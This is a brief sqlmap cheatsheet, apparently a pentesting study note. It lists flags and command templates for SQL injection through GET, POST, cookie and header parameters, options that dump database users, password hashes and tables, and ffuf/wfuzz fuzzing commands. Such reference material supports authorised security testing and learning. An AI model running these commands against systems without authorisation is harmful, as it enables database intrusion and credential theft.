SQLmap Cheatsheet
Info
This note is still in development.
Generic Arguments¶
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
Retrieve Information¶
-
Internal
--current-user #Get current user --is-dba #Check if current user is Admin --hostname #Get hostname --users #Get usernames od DB --passwords #Get passwords of users in DB --privileges #Get privileges
-
DB Data
--all #Retrieve everything --dump #Dump DBMS database table entries --dbs #Names of the available databases --tables #Tables of a database ( -D <DB NAME> ) --columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> ) -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
Injection¶
## GET Request Injection
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
## POST Request Injection
sqlmap -u "http://example.com" --data "username=*&password=*"
# SQLmap POST Injection
sqlmap -u "http(s)://<ip_addr>:<port>/<directory>" --method POST --data "field1=*&field2=*&field3=*" -p "field3"
## Header & Othe HTTP Method Injection
# Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
# Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
# PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
Examples¶
# Enumeration
sudo ffuf -u http(s)://<ip_addr>:<port>/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Burpsuite to see fields being sent
# SQLmap POST Injection
sqlmap -u "http(s)://<ip_addr>:<port>/<directory>" --method POST --random-agent --data "field1=*&field2=*&field3=*" -p "field3"
# Fuzzing GET Parameter
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -u "$URL/index.php?id=FUZZ"
# Fuzzing POST Parameter
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -d "id=FUZZ" -u "$URL/index.php"